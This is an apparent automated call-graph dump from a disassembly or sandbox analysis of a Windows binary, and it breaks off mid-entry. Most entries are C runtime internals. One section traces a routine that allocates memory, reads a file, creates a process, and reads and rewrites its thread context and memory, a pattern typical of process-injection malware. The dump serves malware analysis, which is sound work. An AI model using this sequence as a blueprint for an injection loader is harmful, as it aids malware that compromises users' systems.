20 API calls 7053->7054 7058 2676da _abort 7053->7058 7059 2676d4 _abort 7053->7059 7054->7059 7055 267726 7056 26501f __dosmaperr 20 API calls 7055->7056 7057 26772b 7056->7057 7060 264f63 _abort 26 API calls 7057->7060 7066 267752 7058->7066 7091 2661a3 EnterCriticalSection 7058->7091 7059->7055 7059->7058 7063 267709 7059->7063 7060->7063 7100 26bf49 7063->7100 7065 2677b1 7076 2677dc 7065->7076 7093 267698 7065->7093 7066->7065 7068 2677a9 7066->7068 7066->7076 7092 2661eb LeaveCriticalSection 7066->7092 7071 263f19 _abort 28 API calls 7068->7071 7071->7065 7073 264c4a _abort 38 API calls 7077 26783f 7073->7077 7075 267698 _abort 38 API calls 7075->7076 7096 267861 7076->7096 7077->7063 7078 264c4a _abort 38 API calls 7077->7078 7078->7063 7104 263d28 7079->7104 7085 26755a 7082->7085 7084 26475d 7084->7041 7084->7052 7086 267566 ___scrt_is_nonwritable_in_current_image 7085->7086 7087 2661a3 _abort EnterCriticalSection 7086->7087 7088 267574 7087->7088 7089 2675a8 _abort LeaveCriticalSection 7088->7089 7090 26759b ___scrt_is_nonwritable_in_current_image 7089->7090 7090->7084 7091->7066 7092->7068 7094 264c4a _abort 38 API calls 7093->7094 7095 26769d 7094->7095 7095->7075 7097 267867 7096->7097 7099 267830 7096->7099 7103 2661eb LeaveCriticalSection 7097->7103 7099->7063 7099->7073 7099->7077 7101 2629bb _ValidateLocalCookies 5 API calls 7100->7101 7102 26bf54 7101->7102 7102->7102 7103->7099 7105 263d34 _abort 7104->7105 7106 2626b6 _abort GetModuleHandleW 7105->7106 7113 263d4c 7105->7113 7108 263d40 7106->7108 7108->7113 7126 263e82 GetModuleHandleExW 7108->7126 7112 263dc9 7117 263de1 7112->7117 7121 263c55 _abort 5 API calls 7112->7121 7133 2661a3 EnterCriticalSection 7113->7133 7114 263d54 7114->7112 7125 263df2 7114->7125 7134 264445 7114->7134 7115 263e0f 7140 263e41 7115->7140 7116 263e3b 7120 26bf49 _abort 5 API calls 7116->7120 7122 263c55 _abort 5 API calls 7117->7122 7124 263e40 7120->7124 7121->7117 7122->7125 7137 263e32 7125->7137 7127 263eac GetProcAddress 7126->7127 7131 263ec1 7126->7131 7127->7131 7128 263ed5 FreeLibrary 7129 263ede 7128->7129 7130 2629bb _ValidateLocalCookies 5 API calls 7129->7130 7132 263ee8 7130->7132 7131->7128 7131->7129 7132->7113 7133->7114 7135 26417e _abort 20 API calls 7134->7135 7136 26445c 7135->7136 7136->7112 7138 2661eb _abort LeaveCriticalSection 7137->7138 7139 263e0b 7138->7139 7139->7115 7139->7116 7141 26666e _abort 10 API calls 7140->7141 7142 263e4b 7141->7142 7143 263e6f 7142->7143 7144 263e4f GetPEB 7142->7144 7146 263e82 _abort 8 API calls 7143->7146 7144->7143 7145 263e5f GetCurrentProcess TerminateProcess 7144->7145 7145->7143 7147 263e77 ExitProcess 7146->7147 7148->7006 7152 2661eb LeaveCriticalSection 7149->7152 7151 265a70 7151->7006 7152->7151 7154 264815 7153->7154 7160 26480b 7153->7160 7155 264c4a _abort 38 API calls 7154->7155 7154->7160 7156 264836 7155->7156 7161 267f84 7156->7161 7160->7014 7160->7015 7162 267f97 7161->7162 7163 26484f 7161->7163 7162->7163 7169 267255 7162->7169 7165 267fb1 7163->7165 7166 267fc4 7165->7166 7167 267fd9 7165->7167 7166->7167 7168 2659d8 __fassign 38 API calls 7166->7168 7167->7160 7168->7167 7170 267261 ___scrt_is_nonwritable_in_current_image 7169->7170 7171 264c4a _abort 38 API calls 7170->7171 7172 26726a 7171->7172 7173 2672b8 ___scrt_is_nonwritable_in_current_image 7172->7173 7181 2661a3 EnterCriticalSection 7172->7181 7173->7163 7175 267288 7182 2672cc 7175->7182 7180 264758 _abort 38 API calls 7180->7173 7181->7175 7183 26729c 7182->7183 7184 2672da __fassign 7182->7184 7186 2672bb 7183->7186 7184->7183 7185 267008 __fassign 20 API calls 7184->7185 7185->7183 7187 2661eb _abort LeaveCriticalSection 7186->7187 7188 2672af 7187->7188 7188->7173 7188->7180 7195 26575f 7189->7195 7198 265809 7189->7198 7192 2629bb _ValidateLocalCookies 5 API calls 7194 2658b5 7192->7194 7194->7028 7199 266e4e 7195->7199 7197 268a70 43 API calls 7197->7198 7198->7192 7200 2647f8 __fassign 38 API calls 7199->7200 7201 266e6e MultiByteToWideChar 7200->7201 7203 266eac 7201->7203 7204 266f44 7201->7204 7206 2646b0 __onexit 21 API calls 7203->7206 7210 266ecd __alloca_probe_16 ___scrt_fastfail 7203->7210 7205 2629bb _ValidateLocalCookies 5 API calls 7204->7205 7207 2657c0 7205->7207 7206->7210 7213 268a70 7207->7213 7208 266f3e 7218 266f6b 7208->7218 7210->7208 7211 266f12 MultiByteToWideChar 7210->7211 7211->7208 7212 266f2e GetStringTypeW 7211->7212 7212->7208 7214 2647f8 __fassign 38 API calls 7213->7214 7215 268a83 7214->7215 7222 268853 7215->7222 7219 266f88 7218->7219 7220 266f77 7218->7220 7219->7204 7220->7219 7221 264676 ___free_lconv_mon 20 API calls 7220->7221 7221->7219 7223 26886e 7222->7223 7224 268894 MultiByteToWideChar 7223->7224 7225 2688be 7224->7225 7226 268a48 7224->7226 7231 2646b0 __onexit 21 API calls 7225->7231 7232 2688df __alloca_probe_16 7225->7232 7227 2629bb _ValidateLocalCookies 5 API calls 7226->7227 7228 2657e1 7227->7228 7228->7197 7229 268994 7235 266f6b __freea 20 API calls 7229->7235 7230 268928 MultiByteToWideChar 7230->7229 7233 268941 7230->7233 7231->7232 7232->7229 7232->7230 7249 266564 7233->7249 7235->7226 7237 2689a3 7239 2646b0 __onexit 21 API calls 7237->7239 7243 2689c4 __alloca_probe_16 7237->7243 7238 26896b 7238->7229 7241 266564 11 API calls 7238->7241 7239->7243 7240 268a39 7242 266f6b __freea 20 API calls 7240->7242 7241->7229 7242->7229 7243->7240 7244 266564 11 API calls 7243->7244 7245 268a18 7244->7245 7245->7240 7246 268a27 WideCharToMultiByte 7245->7246 7246->7240 7247 268a67 7246->7247 7248 266f6b __freea 20 API calls 7247->7248 7248->7229 7250 26621c _abort 5 API calls 7249->7250 7251 26658b 7250->7251 7252 2665ec 10 API calls 7251->7252 7255 266594 7251->7255 7253 2665d4 LCMapStringW 7252->7253 7253->7255 7254 2629bb _ValidateLocalCookies 5 API calls 7256 2665e6 7254->7256 7255->7254 7256->7229 7256->7237 7256->7238 7258 2654ec ___scrt_is_nonwritable_in_current_image 7257->7258 7265 2661a3 EnterCriticalSection 7258->7265 7260 2654f6 7266 26554b 7260->7266 7264 26550f ___scrt_is_nonwritable_in_current_image 7264->7037 7265->7260 7278 265c6b 7266->7278 7268 265599 7269 265c6b 26 API calls 7268->7269 7270 2655b5 7269->7270 7271 265c6b 26 API calls 7270->7271 7272 2655d3 7271->7272 7273 265503 7272->7273 7274 264676 ___free_lconv_mon 20 API calls 7272->7274 7275 265517 7273->7275 7274->7273 7292 2661eb LeaveCriticalSection 7275->7292 7277 265521 7277->7264 7279 265c7c 7278->7279 7288 265c78 7278->7288 7280 265c96 ___scrt_fastfail 7279->7280 7281 265c83 7279->7281 7285 265cc4 7280->7285 7286 265ccd 7280->7286 7280->7288 7282 26501f __dosmaperr 20 API calls 7281->7282 7283 265c88 7282->7283 7284 264f63 _abort 26 API calls 7283->7284 7284->7288 7287 26501f __dosmaperr 20 API calls 7285->7287 7286->7288 7290 26501f __dosmaperr 20 API calls 7286->7290 7289 265cc9 7287->7289 7288->7268 7291 264f63 _abort 26 API calls 7289->7291 7290->7289 7291->7288 7292->7277 7294 264719 7293->7294 7295 26470b 7293->7295 7296 26501f __dosmaperr 20 API calls 7294->7296 7295->7294 7297 264730 7295->7297 7298 264721 7296->7298 7300 26472b 7297->7300 7301 26501f __dosmaperr 20 API calls 7297->7301 7299 264f63 _abort 26 API calls 7298->7299 7299->7300 7300->6957 7301->7298 7306 263ab3 7302->7306 7307 263ae9 7302->7307 7303 263b00 7305 264676 ___free_lconv_mon 20 API calls 7303->7305 7304 264676 ___free_lconv_mon 20 API calls 7304->7307 7305->7306 7306->6956 7307->7303 7307->7304 7311 267432 7308->7311 7312 26744b 7311->7312 7313 2629bb _ValidateLocalCookies 5 API calls 7312->7313 7314 262426 7313->7314 7314->6615 8125 26ab65 8127 26ab8d 8125->8127 8126 26abc5 8127->8126 8128 26abb7 8127->8128 8129 26abbe 8127->8129 8134 26ac37 8128->8134 8138 26ac20 8129->8138 8135 26ac40 8134->8135 8142 26b30f 8135->8142 8139 26ac40 8138->8139 8140 26b30f __startOneArgErrorHandling 21 API calls 8139->8140 8141 26abc3 8140->8141 8144 26b34e __startOneArgErrorHandling 8142->8144 8143 26b3d0 __startOneArgErrorHandling 8150 26b3fa 8143->8150 8155 26362c 8143->8155 8144->8143 8152 26b712 8144->8152 8147 26b406 8149 2629bb _ValidateLocalCookies 5 API calls 8147->8149 8151 26abbc 8149->8151 8150->8147 8159 26ba26 8150->8159 8166 26b735 8152->8166 8157 263654 8155->8157 8156 2629bb _ValidateLocalCookies 5 API calls 8158 263671 8156->8158 8157->8156 8158->8150 8160 26ba48 8159->8160 8162 26ba33 8159->8162 8163 26501f __dosmaperr 20 API calls 8160->8163 8161 26ba4d 8161->8147 8162->8161 8164 26501f __dosmaperr 20 API calls 8162->8164 8163->8161 8165 26ba40 8164->8165 8165->8147 8167 26b760 __raise_exc 8166->8167 8168 26b959 RaiseException 8167->8168 8169 26b730 8168->8169 8169->8143 8170 266162 8171 26616d 8170->8171 8172 266502 11 API calls 8171->8172 8173 266196 8171->8173 8174 266192 8171->8174 8172->8171 8176 2661ba 8173->8176 8177 2661e6 8176->8177 8178 2661c7 8176->8178 8177->8174 8179 2661d1 DeleteCriticalSection 8178->8179 8179->8177 8179->8179 8180 26b163 8181 26b16d 8180->8181 8182 26b179 8180->8182 8181->8182 8183 26b172 CloseHandle 8181->8183 8183->8182 8517 2621e3 8518 2626b6 _abort GetModuleHandleW 8517->8518 8519 2621eb 8518->8519 8520 2621f7 8519->8520 8521 263f19 _abort 28 API calls 8519->8521 8523 262202 ___scrt_is_nonwritable_in_current_image 8520->8523 8524 263efb 8520->8524 8521->8520 8525 263d28 _abort 28 API calls 8524->8525 8526 263f06 8525->8526 8526->8523 8305 2687a0 8308 2687b7 8305->8308 8309 2687c5 8308->8309 8310 2687d9 8308->8310 8311 26501f __dosmaperr 20 API calls 8309->8311 8312 2687f3 8310->8312 8313 2687e1 8310->8313 8314 2687ca 8311->8314 8316 2647f8 __fassign 38 API calls 8312->8316 8320 2687b2 8312->8320 8315 26501f __dosmaperr 20 API calls 8313->8315 8317 264f63 _abort 26 API calls 8314->8317 8318 2687e6 8315->8318 8316->8320 8317->8320 8319 264f63 _abort 26 API calls 8318->8319 8319->8320 8527 2644ef 8530 263c05 8527->8530 8539 263b8a 8530->8539 8533 263b8a 5 API calls 8534 263c23 8533->8534 8535 263adc 20 API calls 8534->8535 8536 263c2e 8535->8536 8537 263adc 20 API calls 8536->8537 8538 263c39 8537->8538 8540 263ba3 8539->8540 8541 2629bb _ValidateLocalCookies 5 API calls 8540->8541 8542 263bc4 8541->8542 8542->8533 8543 263fed 8544 263ff9 ___scrt_is_nonwritable_in_current_image 8543->8544 8545 264030 ___scrt_is_nonwritable_in_current_image 8544->8545 8551 2661a3 EnterCriticalSection 8544->8551 8547 26400d 8548 2672cc __fassign 20 API calls 8547->8548 8549 26401d 8548->8549 8552 264036 8549->8552 8551->8547 8555 2661eb LeaveCriticalSection 8552->8555 8554 26403d 8554->8545 8555->8554 7660 264537 7661 262cbf ___vcrt_uninitialize 8 API calls 7660->7661 7662 26453e 7661->7662 8556 d00001 8557 d00005 8556->8557 8558 d043a5 GetPEB 8557->8558 8559 d00190 8558->8559 7663 264b35 7664 264b50 7663->7664 7665 264b40 7663->7665 7669 264b56 7665->7669 7668 264676 ___free_lconv_mon 20 API calls 7668->7664 7670 264b6f 7669->7670 7671 264b69 7669->7671 7673 264676 ___free_lconv_mon 20 API calls 7670->7673 7672 264676 ___free_lconv_mon 20 API calls 7671->7672 7672->7670 7674 264b7b 7673->7674 7675 264676 ___free_lconv_mon 20 API calls 7674->7675 7676 264b86 7675->7676 7677 264676 ___free_lconv_mon 20 API calls 7676->7677 7678 264b91 7677->7678 7679 264676 ___free_lconv_mon 20 API calls 7678->7679 7680 264b9c 7679->7680 7681 264676 ___free_lconv_mon 20 API calls 7680->7681 7682 264ba7 7681->7682 7683 264676 ___free_lconv_mon 20 API calls 7682->7683 7684 264bb2 7683->7684 7685 264676 ___free_lconv_mon 20 API calls 7684->7685 7686 264bbd 7685->7686 7687 264676 ___free_lconv_mon 20 API calls 7686->7687 7688 264bc8 7687->7688 7689 264676 ___free_lconv_mon 20 API calls 7688->7689 7690 264bd6 7689->7690 7695 264a1c 7690->7695 7701 264928 7695->7701 7697 264a40 7698 264a6c 7697->7698 7714 264989 7698->7714 7700 264a90 7700->7668 7702 264934 ___scrt_is_nonwritable_in_current_image 7701->7702 7709 2661a3 EnterCriticalSection 7702->7709 7704 264968 7710 26497d 7704->7710 7705 26493e 7705->7704 7708 264676 ___free_lconv_mon 20 API calls 7705->7708 7707 264975 ___scrt_is_nonwritable_in_current_image 7707->7697 7708->7704 7709->7705 7713 2661eb LeaveCriticalSection 7710->7713 7712 264987 7712->7707 7713->7712 7715 264995 ___scrt_is_nonwritable_in_current_image 7714->7715 7722 2661a3 EnterCriticalSection 7715->7722 7717 26499f 7723 264bff 7717->7723 7719 2649b2 7727 2649c8 7719->7727 7721 2649c0 ___scrt_is_nonwritable_in_current_image 7721->7700 7722->7717 7724 264c0e __fassign 7723->7724 7726 264c35 __fassign 7723->7726 7724->7726 7730 267008 7724->7730 7726->7719 7844 2661eb LeaveCriticalSection 7727->7844 7729 2649d2 7729->7721 7732 267088 7730->7732 7733 26701e 7730->7733 7734 264676 ___free_lconv_mon 20 API calls 7732->7734 7757 2670d6 7732->7757 7733->7732 7739 264676 ___free_lconv_mon 20 API calls 7733->7739 7740 267051 7733->7740 7735 2670aa 7734->7735 7736 264676 ___free_lconv_mon 20 API calls 7735->7736 7741 2670bd 7736->7741 7737 264676 ___free_lconv_mon 20 API calls 7742 26707d 7737->7742 7738 2670e4 7743 267144 7738->7743 7749 264676 20 API calls ___free_lconv_mon 7738->7749 7744 267046 7739->7744 7745 264676 ___free_lconv_mon 20 API calls 7740->7745 7756 267073 7740->7756 7746 264676 ___free_lconv_mon 20 API calls 7741->7746 7747 264676 ___free_lconv_mon 20 API calls 7742->7747 7748 264676 ___free_lconv_mon 20 API calls 7743->7748 7758 266bc7 7744->7758 7751 267068 7745->7751 7752 2670cb 7746->7752 7747->7732 7753 26714a 7748->7753 7749->7738 7786 266cc5 7751->7786 7755 264676 ___free_lconv_mon 20 API calls 7752->7755 7753->7726 7755->7757 7756->7737 7798 26717b 7757->7798 7759 266bd8 7758->7759 7785 266cc1 7758->7785 7760 266be9 7759->7760 7762 264676 ___free_lconv_mon 20 API calls 7759->7762 7761 266bfb 7760->7761 7763 264676 ___free_lconv_mon 20 API calls 7760->7763 7764 266c0d 7761->7764 7765 264676 ___free_lconv_mon 20 API calls 7761->7765 7762->7760 7763->7761 7766 264676 ___free_lconv_mon 20 API calls 7764->7766 7768 266c1f 7764->7768 7765->7764 7766->7768 7767 266c31 7769 266c43 7767->7769 7771 264676 ___free_lconv_mon 20 API calls 7767->7771 7768->7767 7770 264676 ___free_lconv_mon 20 API calls 7768->7770 7772 266c55 7769->7772 7773 264676 ___free_lconv_mon 20 API calls 7769->7773 7770->7767 7771->7769 7774 266c67 7772->7774 7775 264676 ___free_lconv_mon 20 API calls 7772->7775 7773->7772 7776 266c79 7774->7776 7778 264676 ___free_lconv_mon 20 API calls 7774->7778 7775->7774 7777 266c8b 7776->7777 7779 264676 ___free_lconv_mon 20 API calls 7776->7779 7780 266c9d 7777->7780 7781 264676 ___free_lconv_mon 20 API calls 7777->7781 7778->7776 7779->7777 7782 266caf 7780->7782 7783 264676 ___free_lconv_mon 20 API calls 7780->7783 7781->7780 7784 264676 ___free_lconv_mon 20 API calls 7782->7784 7782->7785 7783->7782 7784->7785 7785->7740 7787 266cd2 7786->7787 7797 266d2a 7786->7797 7788 266ce2 7787->7788 7789 264676 ___free_lconv_mon 20 API calls 7787->7789 7790 266cf4 7788->7790 7791 264676 ___free_lconv_mon 20 API calls 7788->7791 7789->7788 7792 264676 ___free_lconv_mon 20 API calls 7790->7792 7795 266d06 7790->7795 7791->7790 7792->7795 7793 264676 ___free_lconv_mon 20 API calls 7794 266d18 7793->7794 7796 264676 ___free_lconv_mon 20 API calls 7794->7796 7794->7797 7795->7793 7795->7794 7796->7797 7797->7756 7799 2671a6 7798->7799 7800 267188 7798->7800 7799->7738 7800->7799 7804 266d6a 7800->7804 7803 264676 ___free_lconv_mon 20 API calls 7803->7799 7805 266e48 7804->7805 7806 266d7b 7804->7806 7805->7803 7840 266d2e 7806->7840 7809 266d2e __fassign 20 API calls 7810 266d8e 7809->7810 7811 266d2e __fassign 20 API calls 7810->7811 7812 266d99 7811->7812 7813 266d2e __fassign 20 API calls 7812->7813 7814 266da4 7813->7814 7815 266d2e __fassign 20 API calls 7814->7815 7816 266db2 7815->7816 7817 264676 ___free_lconv_mon 20 API calls 7816->7817 7818 266dbd 7817->7818 7819 264676 ___free_lconv_mon 20 API calls 7818->7819 7820 266dc8 7819->7820 7821 264676 ___free_lconv_mon 20 API calls 7820->7821 7822 266dd3 7821->7822 7823 266d2e __fassign 20 API calls 7822->7823 7824 266de1 7823->7824 7825 266d2e __fassign 20 API calls 7824->7825 7826 266def 7825->7826 7827 266d2e __fassign 20 API calls 7826->7827 7828 266e00 7827->7828 7829 266d2e __fassign 20 API calls 7828->7829 7830 266e0e 7829->7830 7831 266d2e __fassign 20 API calls 7830->7831 7832 266e1c 7831->7832 7833 264676 ___free_lconv_mon 20 API calls 7832->7833 7834 266e27 7833->7834 7835 264676 ___free_lconv_mon 20 API calls 7834->7835 7836 266e32 7835->7836 7837 264676 ___free_lconv_mon 20 API calls 7836->7837 7838 266e3d 7837->7838 7839 264676 ___free_lconv_mon 20 API calls 7838->7839 7839->7805 7841 266d65 7840->7841 7842 266d55 7840->7842 7841->7809 7842->7841 7843 264676 ___free_lconv_mon 20 API calls 7842->7843 7843->7842 7844->7729 8188 266b75 8189 266b7a 8188->8189 8191 266b9d 8189->8191 8192 2667a5 8189->8192 8193 2667d4 8192->8193 8194 2667b2 8192->8194 8193->8189 8195 2667c0 DeleteCriticalSection 8194->8195 8196 2667ce 8194->8196 8195->8195 8195->8196 8197 264676 ___free_lconv_mon 20 API calls 8196->8197 8197->8193 8560 2666f5 8562 266700 8560->8562 8563 266726 8560->8563 8561 266710 FreeLibrary 8561->8562 8562->8561 8562->8563 7845 262b30 7856 262af0 7845->7856 7857 262b02 7856->7857 7858 262b0f 7856->7858 7859 2629bb _ValidateLocalCookies 5 API calls 7857->7859 7859->7858 8321 263fba GetCommandLineA GetCommandLineW 7860 262706 7861 26273b 7860->7861 7862 262716 7860->7862 7862->7861 7863 26463a 38 API calls 7862->7863 7864 262746 7863->7864 7865 268004 7866 268011 7865->7866 7867 26479b _abort 20 API calls 7866->7867 7868 26802b 7867->7868 7869 264676 ___free_lconv_mon 20 API calls 7868->7869 7870 268037 7869->7870 7871 26479b _abort 20 API calls 7870->7871 7874 26805d 7870->7874 7873 268051 7871->7873 7872 266502 11 API calls 7872->7874 7875 264676 ___free_lconv_mon 20 API calls 7873->7875 7874->7872 7876 268069 7874->7876 7875->7874 8198 268844 8199 2659ba 51 API calls 8198->8199 8200 268849 8199->8200 7328 d01fb5 7380 d04ab5 7328->7380 7331 d02e2b 7332 d04ab5 4 API calls 7333 d02e27 7332->7333 7333->7331 7387 d00005 7333->7387 7335 d02e41 8 API calls 7336 d02f05 7335->7336 7390 d046c5 7336->7390 7339 d046c5 4 API calls 7340 d0300d 7339->7340 7341 d04ab5 4 API calls 7340->7341 7342 d0301a 7341->7342 7343 d03028 7342->7343 7344 d04ab5 4 API calls 7342->7344 7345 d046c5 4 API calls 7343->7345 7346 d03043 7343->7346 7344->7343 7345->7346 7348 d03063 7346->7348 7440 d01e75 7346->7440 7351 d030ca 7348->7351 7399 d01635 7348->7399 7351->7331 7354 d03132 7351->7354 7355 d030fa 7351->7355 7352 d04ab5 4 API calls 7353 d030a1 7352->7353 7353->7351 7356 d04ab5 4 API calls 7353->7356 7359 d03140 7354->7359 7360 d03178 7354->7360 7357 d046c5 4 API calls 7355->7357 7358 d030af 7356->7358 7372 d03117 7357->7372 7358->7351 7361 d046c5 4 API calls 7358->7361 7362 d046c5 4 API calls 7359->7362 7363 d03186 7360->7363 7364 d031be 7360->7364 7361->7351 7362->7372 7365 d046c5 4 API calls 7363->7365 7367 d03204 7364->7367 7368 d031cc 7364->7368 7365->7372 7366 d03328 ExitProcess 7366->7331 7373 d03212 7367->7373 7374 d03247 7367->7374 7370 d046c5 4 API calls 7368->7370 7370->7372 7371 d03316 7371->7366 7372->7366 7372->7371 7424 d01985 7372->7424 7375 d046c5 4 API calls 7373->7375 7376 d03255 7374->7376 7377 d0328a 7374->7377 7375->7372 7378 d046c5 4 API calls 7376->7378 7379 d046c5 4 API calls 7377->7379 7378->7372 7379->7372 7381 d046c5 4 API calls 7380->7381 7382 d04b46 7381->7382 7383 d046c5 4 API calls 7382->7383 7385 d02e19 7382->7385 7384 d04b7d 7383->7384 7384->7385 7386 d046c5 4 API calls 7384->7386 7385->7331 7385->7332 7386->7384 7443 d043a5 GetPEB 7387->7443 7389 d00190 7389->7335 7445 d04135 GetPEB 7390->7445 7392 d046d0 7393 d0484c VirtualAlloc 7392->7393 7394 d04877 7393->7394 7395 d02fe5 7393->7395 7396 d04135 GetPEB 7394->7396 7397 d0487d 7394->7397 7395->7339 7396->7397 7397->7395 7398 d04938 CallWindowProcW VirtualFree 7397->7398 7398->7395 7400 d046c5 4 API calls 7399->7400 7401 d017d3 7400->7401 7402 d046c5 4 API calls 7401->7402 7403 d0180a 7402->7403 7404 d046c5 4 API calls 7403->7404 7423 d01816 7403->7423 7405 d01837 7404->7405 7405->7423 7447 d00df5 7405->7447 7407 d01896 7410 d046c5 4 API calls 7407->7410 7409 d0184e 7409->7407 7411 d01871 7409->7411 7409->7423 7450 d00395 7409->7450 7412 d018c6 7410->7412 7411->7407 7414 d046c5 4 API calls 7411->7414 7413 d00df5 4 API calls 7412->7413 7412->7423 7415 d018dd 7413->7415 7414->7407 7416 d046c5 4 API calls 7415->7416 7415->7423 7417 d01901 7416->7417 7419 d0192f 7417->7419 7417->7423 7467 d00605 7417->7467 7420 d01954 7419->7420 7421 d046c5 4 API calls 7419->7421 7519 d00eb5 7420->7519 7421->7420 7423->7351 7423->7352 7437 d01a0d 7424->7437 7425 d01acd CreateProcessW 7426 d01ade GetThreadContext 7425->7426 7431 d01ad9 7425->7431 7427 d01aff ReadProcessMemory 7426->7427 7426->7431 7427->7431 7427->7437 7428 d01e66 7428->7372 7430 d03a35 9 API calls 7430->7437 7431->7428 7628 d03a35 7431->7628 7432 d03c15 9 API calls 7432->7437 7435 d01d7e SetThreadContext 7435->7431 7435->7437 7437->7425 7437->7430 7437->7431 7437->7432 7437->7435 7438 d046c5 4 API calls 7437->7438 7439 d01dde FindCloseChangeNotification 7437->7439 7595 d03ad5 7437->7595 7606 d03645 7437->7606 7617 d03975 7437->7617 7438->7437 7439->7437 7441 d046c5 4 API calls 7440->7441 7442 d01f07 7441->7442 7442->7348 7444 d043cf 7443->7444 7444->7389 7446 d04148 7445->7446 7446->7392 7448 d046c5 4 API calls 7447->7448 7449 d00e83 7448->7449 7449->7409 7451 d00468 7450->7451 7452 d046c5 4 API calls 7451->7452 7453 d00485 7452->7453 7454 d046c5 4 API calls 7453->7454 7455 d0050f 7454->7455 7456 d00005 GetPEB 7455->7456 7457 d0054d 7456->7457 7530 d04675 7457->7530 7460 d005a3 7544 d00205 7460->7544 7461 d00564 7462 d046c5 4 API calls 7461->7462 7464 d0059b 7462->7464 7466 d005d6 7464->7466 7533 d03de5 7464->7533 7466->7409 7468 d0073d 7467->7468 7469 d046c5 4 API calls 7468->7469 7470 d0077c 7469->7470 7471 d046c5 4 API calls 7470->7471 7472 d0079f 7471->7472 7473 d00005 GetPEB 7472->7473 7474 d007d7 7473->7474 7475 d04675 GetPEB 7474->7475 7476 d007ea 7475->7476 7477 d00830 7476->7477 7478 d007ee 7476->7478 7480 d00205 9 API calls 7477->7480 7479 d046c5 4 API calls 7478->7479 7481 d00822 7479->7481 7480->7481 7482 d046c5 4 API calls 7481->7482 7508 d00860 7481->7508 7483 d00886 7482->7483 7484 d046c5 4 API calls 7483->7484 7485 d008b0 7484->7485 7486 d00005 GetPEB 7485->7486 7485->7508 7487 d008cf 7486->7487 7488 d04675 GetPEB 7487->7488 7489 d008e2 7488->7489 7490 d008e6 7489->7490 7491 d0091c 7489->7491 7492 d046c5 4 API calls 7490->7492 7565 d00245 7491->7565 7494 d00914 7492->7494 7495 d03de5 9 API calls 7494->7495 7494->7508 7496 d0095d 7495->7496 7497 d046c5 4 API calls 7496->7497 7498 d009ad 7497->7498 7499 d00005 GetPEB 7498->7499 7500 d009e8 7499->7500 7501 d04675 GetPEB 7500->7501 7502 d009fb 7501->7502 7503 d00a3b 7502->7503 7504 d009ff 7502->7504 7506 d00205 9 API calls 7503->7506 7505 d046c5 4 API calls 7504->7505 7507 d00a33 7505->7507 7506->7507 7507->7508 7509 d00005 GetPEB 7507->7509 7508->7417 7510 d00a85 7509->7510 7511 d04675 GetPEB 7510->7511 7512 d00a98 7511->7512 7513 d00ad3 7512->7513 7514 d00a9c 7512->7514 7568 d00225 7513->7568 7515 d046c5 4 API calls 7514->7515 7517 d00acb 7515->7517 7517->7508 7518 d03de5 9 API calls 7517->7518 7518->7508 7520 d046c5 4 API calls 7519->7520 7521 d0151b 7520->7521 7522 d046c5 4 API calls 7521->7522 7523 d01542 7522->7523 7524 d046c5 4 API calls 7523->7524 7527 d01554 7523->7527 7525 d0157b 7524->7525 7526 d046c5 4 API calls 7525->7526 7528 d015eb 7526->7528 7527->7423 7528->7527 7571 d00b25 7528->7571 7531 d00005 GetPEB 7530->7531 7532 d00560 7531->7532 7532->7460 7532->7461 7534 d03dfa 7533->7534 7535 d00005 GetPEB 7534->7535 7536 d03e03 7535->7536 7537 d04675 GetPEB 7536->7537 7538 d03e16 7537->7538 7539 d03e52 7538->7539 7540 d03e1a 7538->7540 7560 d04115 7539->7560 7547 d03345 7540->7547 7543 d03e47 7543->7466 7545 d03345 9 API calls 7544->7545 7546 d0020f 7545->7546 7546->7464 7548 d00005 GetPEB 7547->7548 7557 d033e4 7548->7557 7550 d03415 CreateFileW 7556 d03422 7550->7556 7550->7557 7551 d0343e VirtualAlloc 7552 d0345c ReadFile 7551->7552 7551->7556 7555 d0347a VirtualAlloc 7552->7555 7552->7556 7553 d03630 7553->7543 7554 d03622 VirtualFree 7554->7553 7555->7556 7555->7557 7556->7553 7556->7554 7557->7551 7557->7556 7558 d0353f FindCloseChangeNotification 7557->7558 7559 d0354c VirtualFree 7557->7559 7563 d04405 GetPEB 7557->7563 7558->7557 7559->7557 7561 d03345 9 API calls 7560->7561 7562 d0411f 7561->7562 7562->7543 7564 d0442f 7563->7564 7564->7550 7566 d03345 9 API calls 7565->7566 7567 d0024f 7566->7567 7567->7494 7569 d03345 9 API calls 7568->7569 7570 d0022f 7569->7570 7570->7517 7572 d00c4f 7571->7572 7573 d046c5 4 API calls 7572->7573 7574 d00c7c 7573->7574 7575 d00005 GetPEB 7574->7575 7576 d00cb4 7575->7576 7577 d04675 GetPEB 7576->7577 7578 d00cc7 7577->7578 7579 d00d07 7578->7579 7580 d00ccb 7578->7580 7582 d00205 9 API calls 7579->7582 7581 d046c5 4 API calls 7580->7581 7583 d00cff 7581->7583 7582->7583 7584 d00005 GetPEB 7583->7584 7593 d00d37 7583->7593 7585 d00d51 7584->7585 7586 d04675 GetPEB 7585->7586 7587 d00d64 7586->7587 7588 d00d68 7587->7588 7589 d00d9c 7587->7589 7590 d046c5 4 API calls 7588->7590 7591 d00225 9 API calls 7589->7591 7592 d00d94 7590->7592 7591->7592 7592->7593 7594 d03de5 9 API calls 7592->7594 7593->7528 7594->7593 7596 d03af5 7595->7596 7597 d00005 GetPEB 7596->7597 7598 d03b01 7597->7598 7599 d04675 GetPEB 7598->7599 7600 d03b14 7599->7600 7601 d03bdc 7600->7601 7602 d03b1c 7600->7602 7639 d040d5 7601->7639 7603 d03345 9 API calls 7602->7603 7605 d03bc3 7603->7605 7605->7437 7607 d03662 7606->7607 7608 d00005 GetPEB 7607->7608 7609 d0366b 7608->7609 7610 d04675 GetPEB 7609->7610 7611 d0367e 7610->7611 7612 d03686 7611->7612 7613 d0371c 7611->7613 7615 d03345 9 API calls 7612->7615 7642 d04055 7613->7642 7616 d03703 7615->7616 7616->7437 7618 d03992 7617->7618 7619 d00005 GetPEB 7618->7619 7620 d0399b 7619->7620 7621 d04675 GetPEB 7620->7621 7622 d039ae 7621->7622 7623 d039b2 7622->7623 7624 d039fe 7622->7624 7626 d03345 9 API calls 7623->7626 7645 d04095 7624->7645 7627 d039f3 7626->7627 7627->7437 7629 d03a4a 7628->7629 7630 d00005 GetPEB 7629->7630 7631 d03a53 7630->7631 7632 d04675 GetPEB 7631->7632 7633 d03a66 7632->7633 7634 d03ab6 7633->7634 7635 d03a6a 7633->7635 7648 d040b5 7634->7648 7637 d03345 9 API calls 7635->7637 7638 d03aab 7637->7638 7638->7428 7640 d03345 9 API calls 7639->7640 7641 d040df 7640->7641 7641->7605 7643 d03345 9 API calls 7642->7643 7644 